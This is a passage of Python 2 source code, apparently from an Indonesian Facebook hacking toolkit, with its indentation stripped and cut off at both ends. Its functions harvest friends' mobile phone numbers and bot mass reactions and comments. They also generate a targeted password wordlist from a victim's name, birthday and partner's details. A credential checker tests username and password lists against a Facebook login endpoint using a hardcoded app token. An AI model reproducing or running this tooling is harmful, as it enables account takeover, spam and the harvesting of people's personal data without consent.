except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
